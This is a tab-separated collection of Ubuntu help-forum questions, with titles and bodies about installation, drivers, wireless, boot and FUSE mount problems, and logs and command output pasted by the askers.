433732	advice for troubleshooting a ( url ) preseed file ?	i 'm working on my first preseed file , and to avoid having to re-burn a dvd every time i make a change , i 'm hosting it on a webserver and loading it with preseed/url= ... to load the preseed , i 'm booting a virtual machine from an edubuntu 12.04 lts dvd , selecting the install edubuntu option , pressing f6 , and replacing the file= ... with auto url= ... according to the logs on my webserver , the preseed file is getting downloaded by the installer , but then ... as far as i can tell , it is n't being used . for example , i get prompted to select a language even though d-i debian-installer/locale string en_us is right there at the top of the preseed . i also tried this `` 100 % automated '' preseed with the same results . so , apparently something is going wrong between the installer retrieving my preseed and the contents thereof actually getting used , and i 'm at a loss for how to troubleshoot this further . if i do a ctrl+alt+f2 while the installer starts , i can see a bunch of stuff happening , including several `` authentication failed '' messages that may or may not mean anything , but if that output gets saved in any way that lets me do a meaningful examination of it i have n't found it . i 'm sure i ca n't be the first person to have this problem , but i did n't find much when i searched for `` preseed troubleshooting '' here or on the ubuntu forums , so perhaps this would be a good thread to start . any advice would be greatly appreciated !
433733	is all of my data backup-ed with `adb backup -apk -shared -all` ?	per the ubuntu wiki i backup-ed my android phone like so : adb backup -apk -shared -all but after it finished , the backup.ad file was only 6,3 mb . will it clearly stats in the wiki that : ... this should hopefully create backup.ab with all of your apps , os , and data ... with all of my pictures , and apps etc.. etc.. i can only asume that it should result in a large gb sized .db file . question : is all of my data backup-ed with adb backup -apk -shared -all ?
433734	suspend takes very long time , wireless card unavailable in network manager on resume	when i put the laptop to sleep from ubuntu gui it takes a very long time , so there is something happening that 's not logged . when the computer is resumed again , i 've lost the wireless connection and must manually type nmcli nm sleep false to wakeup the wireless card . from the log ; henning-msi networkmanager [ 694 ] : < info > sleep requested ( sleeping : no enabled : yes ) mar 13 14:53:57 henning-msi networkmanager [ 694 ] : < info > sleeping or disabling ... mar 13 14:53:57 henning-msi networkmanager [ 694 ] : < info > ( wlan0 ) : device state change : activated - > unmanaged ( reason 'sleeping ' ) [ 100 10 37 ] mar 13 14:53:57 henning-msi networkmanager [ 694 ] : < info > ( wlan0 ) : deactivating device ( reason 'sleeping ' ) [ 37 ] mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 1012 mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : withdrawing address record for fe80 : :4261:86ff : fe9f:62b7 on wlan0 . mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :4261:86ff : fe9f:62b7 . mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : interface wlan0.ipv6 no longer relevant for mdns . mar 13 14:53:58 henning-msi kernel : [ 444.690647 ] wlan0 : deauthenticating from 84 : c9 : b2:6a : c0:98 by local choice ( reason=3 ) mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : withdrawing address record for 192.168.0.100 on wlan0 . mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.0.100 . mar 13 14:53:58 henning-msi avahi-daemon [ 689 ] : interface wlan0.ipv4 no longer relevant for mdns . mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < warn > dns : plugin dnsmasq update failed mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > removing dns information from /sbin/resolvconf mar 13 14:53:58 henning-msi kernel : [ 444.705874 ] cfg80211 : calling crda to update world regulatory domain mar 13 14:53:58 henning-msi dnsmasq [ 1051 ] : setting upstream servers from dbus mar 13 14:53:58 henning-msi wpa_supplicant [ 798 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 mar 13 14:53:58 henning-msi kernel : [ 444.726147 ] cfg80211 : world regulatory domain updated : mar 13 14:53:58 henning-msi kernel : [ 444.726159 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) mar 13 14:53:58 henning-msi kernel : [ 444.726168 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 13 14:53:58 henning-msi kernel : [ 444.726176 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 13 14:53:58 henning-msi kernel : [ 444.726184 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) mar 13 14:53:58 henning-msi kernel : [ 444.726191 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 13 14:53:58 henning-msi kernel : [ 444.726198 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( wlan0 ) : cleaning up ... mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( wlan0 ) : taking down device . mar 13 14:53:58 henning-msi whoopsie [ 1002 ] : offline mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( eth0 ) : device state change : unavailable - > unmanaged ( reason 'sleeping ' ) [ 20 10 37 ] mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( eth0 ) : cleaning up ... mar 13 14:53:58 henning-msi dbus [ 539 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) mar 13 14:53:58 henning-msi networkmanager [ 694 ] : < info > ( eth0 ) : taking down device . mar 13 14:53:58 henning-msi dbus [ 539 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) mar 13 14:53:58 henning-msi dbus [ 539 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' mar 13 14:53:58 henning-msi dbus [ 539 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' mar 13 14:53:59 henning-msi kernel : [ 446.070559 ] pm : syncing filesystems ... done . mar 13 14:53:59 henning-msi kernel : [ 446.164366 ] pm : preparing system for mem sleep mar 13 14:55:49 henning-msi rtkit-daemon [ 1406 ] : the canary thread is apparently starving . taking action . mar 13 14:55:49 henning-msi rtkit-daemon [ 1406 ] : demoting known real-time threads . mar 13 14:55:49 henning-msi kernel : [ 446.721567 ] freezing user space processes ... ( elapsed 0.003 seconds ) done . mar 13 14:55:49 henning-msi kernel : [ 446.724893 ] freezing remaining freezable tasks ... ( elapsed 0.001 seconds ) done . mar 13 14:55:49 henning-msi kernel : [ 446.726310 ] pm : entering mem sleep mar 13 14:55:49 henning-msi kernel : [ 446.726354 ] suspending console ( s ) ( use no_console_suspend to debug ) mar 13 14:55:49 henning-msi kernel : [ 446.726783 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache mar 13 14:55:49 henning-msi kernel : [ 446.727005 ] sd 0:0:0:0 : [ sda ] stopping disk mar 13 14:55:49 henning-msi kernel : [ 446.730201 ] nuvoton-cir 00:09 : disabled mar 13 14:55:49 henning-msi kernel : [ 543.972121 ] pm : suspend of devices complete after 97245.560 msecs mar 13 14:55:49 henning-msi kernel : [ 543.972419 ] pm : late suspend of devices complete after 0.290 msecs my wireless network card is ; 01:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 ) subsystem : micro-star international co. , ltd. device 6897 flags : bus master , fast devsel , latency 0 , irq 16 i/o ports at b800 [ size=256 ] memory at fe8fc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8192se i 'm on ubuntu 13.10 , linux kernel 3.11.0-18-generic modinfo rtl8192se filename : /lib/modules/3.11.0-18- generic/kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko firmware : rtlwifi/rtl8192sefw.bin description : realtek 8192s/8191s 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : bbe7cf1c21ed0cf95992d78 alias : pci : v000010ecd00008174sv*sd*bc*sc*i* alias : pci : v000010ecd00008173sv*sd*bc*sc*i* alias : pci : v000010ecd00008172sv*sd*bc*sc*i* alias : pci : v000010ecd00008171sv*sd*bc*sc*i* alias : pci : v000010ecd00008192sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.11.0-18-generic smp mod_unload modversions 686 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) i think this problem is related to network manager vs power save . because when i type sudo pw-suspend the laptop enter suspend ok , and resumes with wireless intact ... . ? to further investigate this i took a diff on /var/log/pm-suspend.log between suspend from commandline vs gui . when using the gui , i get 'failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory' could this somehow stall the proper suspend via gui ?
433735	how can i get firefox to use the kde style ?	there are some problems using firefox in kubuntu . the menus are ugly and do not use the kde style . the file browser for uploading or opening files is also ugly , and is not the default kde mini-file-browser . the filetype icons are not shown correctly in the downloads window . in the small downloads window , if i right-click a file and select `` open containing folder '' , nothing happens . gtk3-engines-oxygen is installed and `` oxygen-gtk '' is the default gtk style in system settings > application appearance > gtk . here 's an example of what it looks like : something tells me i am missing something to integrate firefox into kde . what can i do to get flamewolf - ahem firefox to integrate nicely with kde ?
433738	how to check the ip address of the ethernet interface on the target device ?	i am new in embeddedlinux , , also i want guidelines about how to run my first application on target ?
433739	clipboard syncronization between wine and x11	i installed lingoes dictionary in wine . it has a popup translator that is triggered by clipboard change . when i copy or select an item it must translate the word , but in wine , when i copy or select a word , lingoes dictionary remains unresponsive as if nothing has been copied . i can paste into lingoes dictionary through right click context menu then it translate . how can i enable auto clipboard sync between wine and x11 ?
433740	can not get gigabit connection with broadcom nextreme 5703 an tg3.ko	i 'm new to linux and to prove it i installed ubuntu server 12.04 on an old fujitsu - siemens primergy tx 200 server ( 11 years old and still works ) . my problem is that although it recognizes the network card ( broadcom nextreme 5703 ) in the gui ( i have installed gnome shell ) can not access the network configuration and the wired lan apears listed as inactive . i downloaded the driver from broadcomm and have installed as indicated in the readme but nothing . when i open the network icon , it appears as `` not managed wired network '' operating at 100 mb / s. pray apologize in advance if this inquiry should not go in this part of the forum . content of /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp
433742	creating/editing the mouse driver	i am doing a project in the field of embedded systems and the project that i am working on is about making a new human interference device ( hid ) which will be connected thorough usb port . the working of the device will be same as an optical mouse . as i am trying to make a new device either i have to make a new device driver or edit the current mouse driver in such a way that my device gets recognized and works according to the requirement . i need the assistance either in creating a new driver or editing the present one . note : i am new person and i dont know anything about coding , so please make it simple while explaining . thank you in advance ! : )
433745	start `` chrome '' with certain command line parameters ?	unfortunately , we have some intranet sites that `` insecure '' content ; thus i really really want to start chrome with `` -- allow-running-insecure-content '' . i `` locked '' chrome to the unity launcher , later on , i edited /usr/share/applications/google-chrome.desktop and added this parameter . but when starting chrome using the unity launcher ... it does n't start in that mode . i had a closer look and saw that the .desktop file even says `` -- incognito '' , and no , chrome does start in normal mode . long story short : why is the desktop file content not relevant when starting chrome using the unity launcher panel ?
433748	use terminal to translate some text	with my daily work i need to translate some words frequently and it 's exhausting to do it with google translate each time since i have to leave my terminal to do so : ) . so is there a way that could i use the terminal commands to translate some text ?
433752	how to good and easy add all kernel required modules to /lib/modules/ $ ( uname -r ) in ubuntu core deployment ?	i would like to deploy `` ubuntu core '' ( 13.10 ) following the deployment instructions of `` ubuntu core '' . this suggests - after installing linux - to add the kernel required modules to /lib/modules/ $ ( uname -r ) ( in step 6 ) . i am preparing a disk image inside a virtual machine that will be moved to physical hardware . finding the loaded modules can be done by running cat /proc/modules or lsmod and i can find the module its full filename ( including path ) using command modinfo module-name -n. does `` adding modules '' mean that i only need to copy ( cp ) the source file ( /lib/modules/3.11.0-18-generic/kernel/drivers/net/ethernet/intel/e1000/e1000.ko ) to the destination ( /mnt/lib/modules/3.11.0-18-generic/kernel/drivers/net/ethernet/intel/e1000/e1000.ko ) ? or is more work needed because modinfo after chroot fails with error message `` ../libkmod/libkmod.c:554 kmod_search_moddep : could not open moddep file '/lib/modules/3.11.0-18-generic/modules.dep.bin ' '' ? what to do later on when the kernel is updated on a running system ? and is there an easy command to process all modules-names from a list , or do i need to write a bash loop for this ?
433757	wireless connection problem while installing ubuntu from disk	i am trying to install ubuntu 12.04.4 lts from a bootable disk . i followed the instructions word for word given here : http : //www.ubuntu.com/download/desktop/install-desktop-long-term-support the system is connected to the wifi network available , and the ubuntu installer verifies the same , yet when i click continue , i remains stuck there for long and then shows `` disconnected from network '' , and furthermore , the listing of the wireless networks within range is not visible either . there is absolutely no problem with my wifi connection because i have other devices connected to it and running at ease . i later booted with windows and there 's no problem in connecting with the network , however this problem occurs again and again each time i try to install ubuntu .
433758	zte 3.5g mtn modem , how to configure	i have tried to configure the mtn zte 3.5g modem on ubuntu 13.10 saucy salamander using lsusb , and selecting its properties . i get nothing after restarting the machine .
433760	intel wireless 7260 ( rev 73 ) / nuc n2820 : ok during install , failed after install	i have a new mini-pc intel nuc n2820 and it has a fairly new wireless controller intel 7260 ( rev 73 ) . i downloaded the source , compiled and installed it . but the problem is that during the installation i connected to wireless ( in the beginning ) , entered the password for the wifi , and it even updated during the installation , but failed after the install was complete .
433766	problem with broadcom bcm4312 on ubuntu 13.10 desktop	i 'm new in ubuntu and i have a problem with my wireless card broadcom bcm 4312 ... i have installed ubuntu 13.10 desktop on my netbook with usb , because i have n't got cd/dvd-rom ... .installation looks fine , ubuntu works fine , too , but i cant connect to the internet by wi-fi . i do n't know , what should i do with it.. : ( ... btw : i can connect to internet via lan , but at my home i ca n't connect by lan , because we have internet developer , which banned connecting from other ip ... .but that 's not problem ... can anyone help me , please ? : ) ... and i connect there some print screens of pci list , iwconfig and installing bcmwl-kernel-source ( this language is slovakian , but it says , that you must insert install cd into media/cdrom , but i have n't got cd-rom -_- ... thank you in advance for every answer : ) domosino @ domosinopc : ~ $ lspci -nn -d : | grep 14e4 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5906m fast ethernet pci express [ 14e4:1713 ] ( rev 02 ) 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) i tried sudo apt-get update and broadcom driver install in setting , but it no work : / ...
433767	ubuntu server gui login issue	i have installed ubuntu server 12.04 , and have a command line interface the works great . however , when i start lightdm i can only log into the gui as guest , not as the user that i created.is there something that i am missing here ? it worked one day , now it no longer works . the screen flashes black for a second , then takes me right back to the login screen where i have the option to login as the user or as a guest user . additionally , each time i do that it has been creating zombie processes that i am having to go in and kill each time . i have included the .xsession-errors from root below . xsession : x session started for root at thu mar 13 10:39:10 edt 2014 localuser : root being added to access control list setting im through im-switch for locale=en_us . start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit/xinput.d/default . gnome_keyring_control=/tmp/keyring-iifhtd ssh_auth_sock=/tmp/keyring-iifhtd/ssh gnome_keyring_pid=2420 gnome_keyring_control=/tmp/keyring-iifhtd ssh_auth_sock=/tmp/keyring-iifhtd/ssh gpg_agent_info=/tmp/keyring-iifhtd/gpg:0:1 gnome_keyring_control=/tmp/keyring-iifhtd ssh_auth_sock=/tmp/keyring-iifhtd/ssh gpg_agent_info=/tmp/keyring-iifhtd/gpg:0:1 gnome_keyring_control=/tmp/keyring-iifhtd ssh_auth_sock=/tmp/keyring-iifhtd/ssh gpg_agent_info=/tmp/keyring-iifhtd/gpg:0:1 ** ( gnome-settings-daemon:2418 ) : warning * : failed to connect context : ok checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : default adding plugins initializing core options ... done initializing composite options ... done * message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done i/o warning : failed to load external entity `` /root/.compiz/session/102153c4caa7fad67139472155474283100000024050034 '' initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... initializing nautilus-gdu extension done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done initializing staticswitcher options ... done initializing unitymtgrabhandles options ... done initializing unityshell options ... done setting update `` run_command_terminal_key '' setting update `` fullscreen_visual_bell '' setting update `` autoraise '' setting update `` autoraise_delay '' setting update `` toggle_window_shaded_key '' setting update `` fullscreen_visual_bell '' setting update `` run_command_terminal_key '' starting gtk-window-decorator connection failure : connection refused pa_context_connect ( ) failed : connection refused ** ( gnome-user-share:2643 ) : warning ** : gnome-user-share can not be started as root for security reasons . ** ( update-notifier:2689 ) : warning ** : not starting for system user ( gnome-settings-daemon:2418 ) : color-plugin-warning ** : done switch to new account , reload devices ( gnome-settings-daemon:2418 ) : color-plugin-warning ** : done switch to new account , reload devices ( gnome-settings-daemon:2418 ) : color-plugin-warning ** : done switch to new account , reload devices
433771	how to install onedrive on ubuntu 13.10 x64	i have ubuntu 13.10 and i do n't know how to install onedrive on ubuntu 13.10 x64 .
433774	grub menu wo n't show up after updating ubuntu , can boot only into windows	i recently installed ubuntu 13.10 on my toshiba p55 a5200 and everything was working perfectly . after i updated ubuntu and installed a few applications grub menu wo n't show up and my computer only boots directly into windows . your help is appreciated .
433775	can partition images ( .img ) , directly mounted under linux	can partition images like nandc.img uimage are file system , can this mounted directly in linux ? mount command ? data inside image file can be viewed ? appreciated thanks ,
433779	how to completely uninstall psx2 ?	i am having problems in uninstalling psx2 from ubuntu 13.04 . can any one have solution.there is no options for uninstalling psx2 whatsoever .
433781	how much disk space does a clean ubuntu studio installation need ?	i 'm considering installing ubuntu studio . i ca n't decide whether to make a clean installation or to install its programs on my existing ubuntu to save disk space . i 'm currently low on free disk space . i just want to know about how much disk space would ubuntu studio take ? just like ubuntu maybe ? or less ?
433784	ubuntu 13.10 failed nvidia drivers install ( no bumblebee )	thinkpad w520 with quadro 1000m , optimus disabled . reading a little bit about the topic , i thought i was well prepared and did the following : sudo apt-get remove -- purge nvidia* sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 sudo apt-get -- purge remove bumblebee sudo reboot alas , despite the bumblebee precaution , next boot takes me to x-mode . i purged the nvidia and after reboot i was back in unity mode . is the official driver from nvidia a better idea ?
433787	problem with installing ubuntu along with windows 7	while installing from an usb , the process is continuing till i get an option of `` install ubuntu inside windows '' .when i click ok the process get stuck and windows is getting started.how can i resolve this ?
433789	question about ubuntu for smart phones	i have the samsung galaxy s4 mini , if i use ubuntu on my phone , will i lose features such as sbeam ? and will it be compatible with us cellular network ?
433792	has anyone successfully installed ubuntu on a lenovo y410p	i see lots of posts on here about folks having major issues with installing ubuntu on a lenovo y410p . has anyone successfully installed ubuntu with no major issues ?
433796	is it possible to install two kernels and choose one on startup ?	i want to install ubuntu studio and i 'm aware that it uses a different linux kernel than normal ubuntu . is it possible to install both kernels and chose which one to use on every startup ? and if yes , how do i do that ? i 'm not very experienced . also tell me if there are other more differences between ubuntu and ubuntu studio other than the linux kernel and the preinstalled software they have . thanks in advance : )
433800	accessibility bus warning when opening files in eclipse from command line ( ubuntu 13.10 )	similar to closed issue gnome menu broken ? when opening a file from the command line for edits in eclipse , i get this warning : ** ( eclipse : nnnn ) : warning ** : could n't register with accessibility bus : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . the 4-digit number at ( eclipse : nnnn ) changes each time i issue an 'eclipse some/file.ext ' command . the file opens but the warning is an annoyance that should n't be happening , it may be indicative of some other problem . updated ubuntu 13.10 64-bit , updated eclipse luna .
433801	why ping -f command needs sudo privileges ?	when i tried to use ping -f ipaddress command in ubuntu for testing my system , it fails with a message : ping : can not flood ; minimal interval , allowed for user , is 200ms when i type man ping and see -f option , it state only the super-user may use this option with zero interval . why does it need that privilege ?
433802	starting a byobu window with a name	how do i start a byobu session with a name and have that name displayed in the bottom left hand corner of the byobu window ? i 've tried byobu new-session -s asxcasd and a new session starts , but the name displayed in the bottom left corner of the byobu window is 0 : * i can rename a session once the session is running , but not when i start byobu from the command line .
433803	missing squid in /etc/init.d	i installed squid v3 on ubuntu 13 . running squid3 -v responds with version 3.3.8 ( yet i can not find any squid script in /etc/init.d ) . i am able to run service squid3 restart ( process shows as running ) . any insight as to what i might have configured incorrectly ? i noticed the missing squid after i made a change to the squid.conf file . thanks in advance . i realized that squid was generating the squid.conf file in /etc/init & not /etc/init.d - i had installed squid via sudo apt-get install squid .
433806	getting black screen in 13.10	i recently install nvidia drivers through terminal using the command `` sudo apt-get install nvidia-323.86 after complete installation i upgrade packages using upgrade command . after that i shutdown it . later after enter password only black screen shown . by enter terminal shortcut key i can open my terminal.. from terminal i also open some software 's like vlc . i tried my things like rm some config file and auto remove and and install upgrade and update install nvidia . remove -- purgge nvidia.* . but did't solve this problem.. plz give me perfect solution.. thanks in advance
433807	what is a easy way to view texi files ?	i am reading some files for a library i plan on using and the files are of extension '.texi ' and although i can open the files in gedit , all the syntax and markups make it difficult to read . also , i cant use the embedded links within the document . is there an go-to program for reading .texi files ? i am using ubuntu 13.10 btw . thx !
433810	what 's the equivalent of rpm -qc package_name in ubuntu ?	# rpm -qc package_name lists the configuration files contained in that rpm package , in a red hat-like os . what 's it 's equivalent command in an ubuntu/debian-based os ?
433813	fusermount : mount failed : permission denied	i 'm trying to use google-drive-ocamlfuse to mount my google drive to an ubuntu 13.04 vm i own on remote sever so i can copy some very large project-related files to my work computer . i 've been searching the web , and none of the solutions given work . id : uid=1387004 ( levicampbell ) gid=1387004 ( levicampbell ) groups=1387004 ( levicampbell ) ,27 ( sudo ) ,33 ( www-data ) ,103 ( fuse ) groups : levicampbell sudo www-data fuse contents of ~/.gdfuse/default/config : docs_file_extension=true verification_code=4/orfov4b9r8rm1ppkvulkd6vyj6rd.sl2asyobr0sbmms0t3ufeso-h0t3iqi umask=0o022 document_format=odt debug=false presentation_format=pdf new_revision=true spreadsheet_format=ods download_docs=false client_id=628727098029.apps.googleusercontent.com drawing_format=png conflict_resolution=server keep_duplicates=false metadata_cache_time=60 client_secret=askubuntuexample read_only=false form_format=ods max_cache_size_mb=512 sqlite3_busy_timeout=500 contents of ~/.gdfuse/default/gdfuse.log : [ 0.000701 ] tid=0 : setting up default filesystem ... [ 0.000788 ] tid=0 : loading configuration from /home/levicampbell/.gdfuse/default/config ... done saving configuration in /home/levicampbell/.gdfuse/default/config ... done [ 0.001475 ] tid=0 : loading application state from /home/levicampbell/.gdfuse/default/state ... done current version : 0.5.2 setting up cache db ... done setting up curl ... done refresh token already present . [ 0.004157 ] tid=0 : starting filesystem /home/levicampbell/documents/ [ 0.031584 ] tid=0 : exiting . curl cleanup ... done clearing context ... done lsmod output : module size used by xt_multiport 12798 0 xt_conntrack 12760 0 xt_recent 18543 0 ipt_reject 12576 0 xt_log 17829 0 xt_limit 12711 0 xt_tcpudp 12924 0 xt_addrtype 12713 0 xt_state 12578 0 iptable_filter 12810 0 nfnetlink_log 18038 0 nfnetlink 14650 1 nfnetlink_log veth 13331 0 aufs 210216 7928 sch_tbf 13251 1 ebt_ip 12538 68 ebtable_broute 12731 0 ebtable_nat 12807 0 ebtable_filter 12827 1 ebtables 31209 3 ebtable_broute , ebtable_nat , ebtable_filter ipt_masquerade 12880 1 iptable_nat 13151 1 nf_conntrack_ipv4 15063 1 nf_defrag_ipv4 12758 1 nf_conntrack_ipv4 nf_nat_ipv4 13316 1 iptable_nat nf_nat 21952 3 ipt_masquerade , nf_nat_ipv4 , iptable_nat nf_conntrack 97581 7 ipt_masquerade , nf_nat , xt_state , nf_nat_ipv4 , xt_conntrack , iptable_nat , nf_conntrack_ipv4 ip_tables 27716 2 iptable_filter , iptable_nat x_tables 34194 14 xt_recent , ip_tables , xt_tcpudp , ipt_masquerade , ebt_ip , xt_limit , xt_state , xt_conntrack , xt_log , xt_multiport , iptable_filter , ebtables , ipt_reject , xt_addrtype bridge 116160 1 ebtable_broute stp 12976 1 bridge llc 14597 2 stp , bridge ip_gre 18288 0 ip_tunnel 23842 1 ip_gre gre 14030 1 ip_gre dm_crypt 23456 0 joydev 17575 0 psmouse 108513 0 serio_raw 13462 0 i2c_piix4 22299 0 mac_hid 13253 0 rbd 65178 39 libceph 232021 1 rbd btrfs 867780 0 xor 21411 1 btrfs raid6_pq 97812 1 btrfs libcrc32c 12644 2 btrfs , libceph hid_generic 12548 0 usbhid 53067 0 hid 106565 2 hid_generic , usbhid floppy 70207 0 cirrus 25286 1 syscopyarea 12633 1 cirrus sysfillrect 12901 1 cirrus sysimgblt 12806 1 cirrus ttm 89884 1 cirrus drm_kms_helper 53224 1 cirrus drm 308397 3 ttm , drm_kms_helper , cirrus what am i doing wrong ? i feel like i 'm missing something obvious , but i do n't know enough about fuse to know . thank you for your consideration .
433817	error in g3data	i am kinda beginner in linux . i need to install this app called g3data . i use the latest synaptic software package to install g3data . hence , i install this app with all its dependencies . then i run this app , and i try loading an image file to it ( by dragging the file onto g3data window ) . it shows an instant error ; error loading file ... i have uninstalled and re-installed it several times . i have tried thousand of methods , but it does n't seem to work . any help will be greatly appreciated . thanx
433819	unable to change brightness using keys after recent 13.10 update	i have been using ubuntu 13.10 for months now without too many hassles . but a couple of days back , my system offered to install this major update and of the many things that have gone wrong , the most prominent one is i am unable to change the brightness of my laptop ( dell inspiron 15r ) using my brightness hotkeys and as far as my knowledge goes , you ca n't do this graphically using ubuntu 's settings ( please correct me if i am mistaken ) . how can i rectify this ? please help my poor eyes !
433828	weak wifi reception on 3 lenovo e130 laptops	we have 4 lenovo e130 laptops in our company , all running ubuntu . one runs on ubuntu 12.04 : it had initial wifi connectivity problems but these stopped and it now connects fine ( no cause identified ) . the others run 13.04 and have not been able to connect to wifi unless i am directly beside the router and even then it gives only 2 out of 4 bars of signal strength . all other devices ( lenovo desktops running ubuntu , imac , tablets and smartphones , some using windows ) are able to connect fine . we upgraded one laptop to 13.10 but the connectivity problem persists : weak signal , continuously asking to re-enter the password , not connecting . it is becoming increasingly problematic for our working needs . i would be very grateful if anyone can provide assistance in terms that a simple-minded user like myself can understand and implement . many thanks indeed !
433830	ubuntu image with applications for office use - mail + open office basically	hi i was wondering if anyone was aware of ubuntu image files that had apps preloaded on them for general office use .
433832	ubuntu 12.04 64-bit problems with full-screen video on several streaming sites	i 'm having a lot of issues by setting full-screen and then exiting to resize the video everytime i do it . some days ago , it was a white screen which appears , but i solved it thanks to this forum . now , for example i set a 720 video on youtube on full screen , and when i exited , it freezed and i had to force shut down . sometimes freezes , sometimes gets black screen . i 'm not able to configure the `` hardware acceleration '' because i can not get that option , why ? this is my config on chrome : //plugins thanks in advance .
433834	rootkit on port 60001 ! ? tiger says so - how do i verify ?	my system is an up-to-date ubuntu 13.10 i 've installed tiger and i 'm getting this # running chkrootkit ( /usr/sbin/chkrootkit ) to perform further checks ... old : -- alert -- [ rootkit005a ] chkrootkit has found a file which seems to be infected because of a rootkit old : -- alert -- [ rootkit009a ] a rootkit seems to be installed in the system old : infected ( ports : 60001 ) what ? ! i 've also tried rkhunter : does n't really find anything directly , here 's the assorted warnings /usr/bin/unhide.rb [ warning ] checking for passwd file changes [ warning ] checking for group file changes [ warning ] checking /dev for suspicious file types [ warning ] checking for hidden files and directories [ warning ] there 's also the suckit thing ( described in another thread here http : //ubuntuforums.org/showthread.php ? t=1680428 ) , but that 's been ruled out as a bug . looking at netstat -ltnp there 's nothing on this port there , well not now anyway . how do i verify this ? how do i go about it ? ?
433836	used dd to backup a disk , now want to look at the filesystem	i dd copied /dev/sdd sudo dd if=/dev/sdd of=backup.img sudo fdisk backup.img command ( m for help ) : p disk backup.img : 143.3 gb , 143274860544 bytes 61 heads , 35 sectors/track , 131069 cylinders , total 279833712 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003c0d1 device boot start end blocks id system backup.img1 2048 286747999 143372976 5 extended backup.img5 4096 286746623 143371264 83 linux command ( m for help ) : q sudo mount backup.img /mnt/disk3 does n't work . not sure what to do now . any suggestions ? time to start over : sounds like i should run dd on the partition , not the entire disk . here 's the output of fdisk : sreeve @ cebuild : ~ $ sudo fdisk /dev/sdd command ( m for help ) : p disk /dev/sdd : 146.8 gb , 146814976000 bytes 61 heads , 35 sectors/track , 134308 cylinders , total 286748000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003c0d1 device boot start end blocks id system /dev/sdd1 2048 286747999 143372976 5 extended /dev/sdd5 4096 286746623 143371264 83 linux command ( m for help ) : so should i do this : sudo dd if=/dev/sdd1 of=/home/sreeve/backup.img or this : sudo dd if=/dev/sdd5 of=/home/sreeve/backup.img
433837	how to boot system normally	i have serious problem with my ubuntu system . yesterday , i installed gdm and set it default display manager , when i rebooted grub menu display i boot to normal boot but only black screen show.please help i want my system up and running .
